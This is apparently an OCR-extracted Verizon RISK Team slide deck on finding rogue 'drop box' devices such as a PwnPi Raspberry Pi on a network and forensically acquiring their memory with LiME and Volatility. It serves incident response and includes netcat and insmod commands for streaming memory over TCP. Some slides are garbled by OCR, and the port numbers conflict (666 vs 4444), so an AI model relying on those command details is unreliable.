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Just Quickly... Who We Are 



The Verizon RISK Team 

-Incident Response 

- All Technologies + Networks 

- Industrial Control Systems 

- Mobile Devices 

-Full Forensic Services 
-Rapid Response Retainer 

- In-house IR training 

- Mock Incidents + Incident Readiness 

-Cyber Security Intelligence 
-eDiscovery 




• Investigative Response 

9 Lab / Protected Storage 

PS Area of Expertise 
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DATA BREACH 
INVESTIGATIONS 

ffiEEftdlflNBi DATA SECURITY 
REPORT FOR SIX YEARS. 

OVER 47,000 SECURITY INCIDENTS 
AND 621 CONFIRMED DATA 
BREACH INCIDENTS. 

TURNS DATA INTO USEFUL, 
ACTIONABLE INFORMATION. 



DOWNLOAD THE FULL 2013 DBIR: 
VERIZONENTERPRISE.COM/DBIR/201 3 
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What Aren't Drop Boxes? 





PWN Plug 
$1000 



Raspberry Pi 
$35 



What Are They Then? 




Android 

Implementations 

$25-$50 



Beagle Board 
$45 
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Threat = "Pen Test" Distro's 




PWNPI & 




KALI Linux & 
(Formerly Backtrack) 




Debian based "Pen Testing" distro's with hundreds of tools across categories: 

•Information Gathering 

•IDS/IPS Identification v^-y:±-L-' 

•Vulnerability Assessment 

•Exploitation 

•Privilege Escalation 

•Maintaining Access fc-^P 

•Stress Testing 
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Variety of Misuse* Actions 



Overall 



Privilege abuse 






Unapproved hardware 


|41% 


Embezzlement 


(37% 


Data mishandling 


10% 




Knowledge abuse 


j 9% 




Unapproved workaround 


4% 




E-mail misuse 


4% 




Net misuse 


3% 




Unknown 


3% 




Unapproved software 


1% 




Illicit content 


1% 




Other 


1% 





61% 




2% 



What is the Risk? 



Large 





87%. 






■Financial ■ Espionage Other 

* Misuse accounts for 13% of Data Breaches in the 2013 DBIR 
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What is the Risk? 



Vector For Misuse 



Overall 



| Physical access 

LAN access 

Remote access 

Unknown 
Non-corporate I 3% 



61% 





I Financial ■ Espionage Other 
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Do I have one on my network? 



Detection Techniques: 

- Segment Networks + Security Monitoring 

• Know your attacker, identify the highest risk assets. 

• Segment those assets. 

• Monitor and investigate unauthorized access attempts from 
within other network segments. 

- Deploy Rogue System Detection 

• New devices are flagged with switch and port number for 
admin review. 

- Carry out physical audits prioritizing high risk 
areas 

• Public areas, meeting rooms, printers, inside devices. 

- Adopt a default port-down policy 






cading_rcom/v;h tc oa ocrc- -c c:< 



cthg preventing ro^& 






Interested in learning 

Reading Room ™^ about security? 



SANS Institute 
InfoSec Reading Room 



Detecting and Preventing Rogue Devices on the 
Network 



Copyright SANS Institute 



Confidential and proprietary materials for authorized Verizon personnel and outside agencies only. Use, disclosure or distribution of this material is not permitted to any unauthorized persons or third parties except by written agreement. 



veri7on 



"Wait by the river long enough and your breach will float by" 



Breach count by discovery method 
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So you find one... now what? 



Now that we are dealing with physical evidence, a whole new range of 
considerations come into play: 

- Finger Prints 

- CCTV footage 

- Documentary Evidence of Contractor / Visitor Access 

- Serial Numbers (Limited manufacture and distribution) 

- cat /proc/cpuinfo (ARM chip* serial number unique) 

- cat ifconfig (MAC address* unique) 

- SIM card ICCID (linked to identity, address and credit card) 
* Bear in mind that the o/s could be misrepresenting these... 
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Know Thine Enemy 



Identify The Device 

• Read circuit board text 

• Read chip numbers 

• Identify The IP in Use 

• Port / Vulnerability Scan 

• Connect To It 
-HDMI 

- Composite Video 
-SSH 

• Reach out to the security community 
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What you should know by now. 



Harware Info: 


Raspberry Pi vB 


O/S: 


Linux 


Distro: 


Debian GNU/Linux 7.0 (wheezy) 


Platform: 


armv61 


Kernel Version: 


3.2.27+ 


Hostname: 


pwnpi 


IP: 


10.1.2.3 
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Containment 
Monitoring 

-TAP/Port Mirror 

-PCAPs 

-Border Security Devices 

Get this thing off my network! 

-DNS Black Hole 

-Migrate 

-Complete Disconnect 



Preservation 



Volatile Data 

-System Memory 
-Volatile Sys Info 



Non-Volatile Data 

-Use Write Blocker 
-Use Forensic Boot Disk 



Now What? 



Analysis 
Volatile Data 

-Volatility 



Non-Volatile Data 

-Std Forensic Tools 



*Consider The Power Source** 
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History Lesson 



Before: 

DD /dev/mem 

-Broken in newer kernels 

-Memory offset issues 

-Memory Size Restrictions 

-Lots of context switches and 
memory loss due to overwriting 
free pages 



root@pwnpi:/# cat /proc/iomem 

00000000-1 effffff : System RAM 
00008000-004c0e77 : Kernel text 
004e2000-005b5127 : Kernel data 

20000000-20000fff : bcm2708_vcio 

20003000-20003fff : 

bcm2708_systemtinner 

20006000-20006fff : bcm2708_usb 
20006000-20006fff : dwc_otg 

20007000-20007fff : bcm2708 dma.O 
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Memory Acquisition 



LiME - Linux Memory Acquisition 

• First announced at ShmooCon201 2 

• Loadable Kernel Module (LKM) 

• Operates only in the kernel 

• Widely Supported 

- Typical *nix support 

- Arm Support 

- Android Support 

• Small Memory Footprint 



At lime-forensics 

IUI LiME - Linux Memory Extractor 












Search projects 








Project Home Downloads Issues Source 










Search Current downloads |^| for 




| Search | 






1 -2 of 2 


Filename t Summary + Labels t 


Uploaded t ReleaseDate t 


Size t DownloadCount t 


m LiME Documentation 1 1 pdf LiME Forensics 
Docu-entaticn 


Mar 19 


Mar 19 


629 KB 799 


m lime-forensics-1.1-r17.tar.QZ LiME Forensics Source 
+ Documentation 


Mar 19 


Mar 19 


597 KB 645 


1 -2 of 2 





code.google.eom/p/linne-forensics/ 
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Getting Ready 



You need to compile a LiME binary for your 
memory acquisition 

- Virtualise* Pentest 0/S and Compile 

- Virtualise* same Kernel / Architecture 

- Buy / Borrow / Steal same device and compile on 
physical device 

Future Possibility 

- DD the SD Card and virtualise using LiveView 

- vPi project (VMWare Virtualisation) 



'Requires QEMU ARM Emulator 



lulating-raspberry-pi-the-easy-tvay'/ 



XEC DESIGN 



: = - Emulating Rasaae'".. - the - - _ 



,'S!) 



QEMU - Emulating Raspberry Pi the easy way (Linux or Windows!) 

~- s :c-:.i . ;■;:..; ho., to emulate an system the quick and easy' ■■■■■■ay 

:e;: - _ _ — -:' -c — y, ■:■; - - 



Assumptions 



and follow inetructionB carefully 



Quick note on QEMU and ARM 1 176 



- ; : ::":;.::: c : e - :- : ■. e I . n ew. If you did not compile QE H It you rself from git, or down toad fairly re 
binaries, replace -cpu annll7 6 with -cpu armll3 6-r2 whenever you see it. Note that you will b« 
out on many important bug fixes and a few unimportant CPU features. If you boot with -cpu armll7 
something abuiitnii - - - ion of QEMU. 
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TIPS 



Totto, we're not in x86 land any more!! 

Download the correct Kernel Headers (ie for PWNPI 3.2.27+) 

$ cd /usr/src 

$ wget http://repo.anconafamily.com/repos/apt/raspbian/pool/main/l/linux- 

upstream/linux-headers-3.2.27+_3.2.27+-3_armhf.deb 

$ dpkg -i linux-headers-3.2.27+_3.2.27+-3_armhf.deb 

•SymLink /lib/modules/3.2.27+/build to /usr/src/linux-headers-3.2.27+ 
•Compile LiME 

Confidential and proprietary materials for authorized Verizon personnel and outside agencies only. Use, disclosure or distribution of this material is not permitted to any unauthorized persons or third parties except by written agreement. 
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LiME Options 



Path 

• Either a path "<path>"(der) or port for listening and pushing the memory out to "tcp:<port>" 
Format 

• RAW - Cats segments together 

• Padded - Inserts Zeros between memory segments 

• Lime - Integrates address space range for each segment into a header (best for Volatility) 
DIO - Direct 10 

• Bypasses kernel to write directly to media (does this by default anyhow) 
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Getting the Job Done 






Network Acquisition 

•Copy localy (Win SCP) 

•Execute on Pi: # insmod <path>/lime.ko "path=tcp:666 format=lime" 

•Collect on Workstation: $ nc <Pi IP Add> 4444 > Pi_Memory.lime 

Local Acquisition 

•Copy to USB Flash 

•Execute LiME: # insmod <path>/lime.ko "path=<path> format=lime" 

Confidential and proprietary materials for authorized Verizon personnel and outside agencies only. Use, disclosure or distribution of this material is not permitted to any unauthorized persons or third parties except by written agreement. 21 
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Pray to Demo Gods 



DEMO TIME 
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For Android 






Android Debug Bridge (ADB) 

•Put the device into USB Debug Mode 

- Sometimes Requires special cables 

- Can be a problem if security policies have disabled USB debug mode 

- Can require reboot (pointless) 

- Use a USB flash drive, write to USB 

- Acquire SD card and then copy lime to the SD card and write memory to the card 
$ adb push <path>lime.ko /sdcard/lime.ko 

$ adb forward tcp:666 tcp:666 
$ adb shell 
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Collect Other Volatile Data: 

- Uptime - Great intel as to when attacker 
installed the device, correlate with: 

• CCTV 

• Employee access card logs 

• Keysafe Logs 

• Contractor / Visitor Logs 

- Date - Determine accuracy of system clock 

- Netstat-nao 

Unplug and Image SD card or DD in place 
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Memory Analysis 



Analysis is relatively straight forward 

- Linux memory analysis in Volatility Framework 

• Need to create a profile for each device 

- apt-get install dwarfdump (and GCC/make + Kernel headers) 

- Check out the volatility source code 

- Make Dwarfile 

• $ cd volatility/tools/linux 

• $ make 

• $ head module.dwarf 

- Get the system. map file (/boot) 

- Place both module.dwarf and system. map into a zip file.... now you have your profile 
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Interesting Things 



Things you can do: 

•PSList - List all processes and offsets 

•PSTree - List the parent / child relationships (ie should see bash spawned from ssh) 

•PSaux - Process arguments 

•Procjnaps - map out process memory space 

•Dumpjnap - get the binary and the static data (great for binary reversing) 

•Kernel objects, Debug Buffer, Kernel memory caches 

•Recover APP Table, ifconfig, routing cache, netstat output, per-socket packet 

queues 
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Disk Analysis 



- Disk analysis in your tool of choice (Open Source / EnCase / FTK) 

• Hash all files in Distro, create a filter 

• GREPforlPs 

• Timeline Analysis 

• Reverse any interesting Binaries 
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Don't forget your other big problem. 



You've only discovered one slice of the Pi 
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Verizon RISK Team 

In case of an incident, contact us 24/7 worldwide: 

Phone: +1.877.330.0465 

Email: ir-global@verizon.com 
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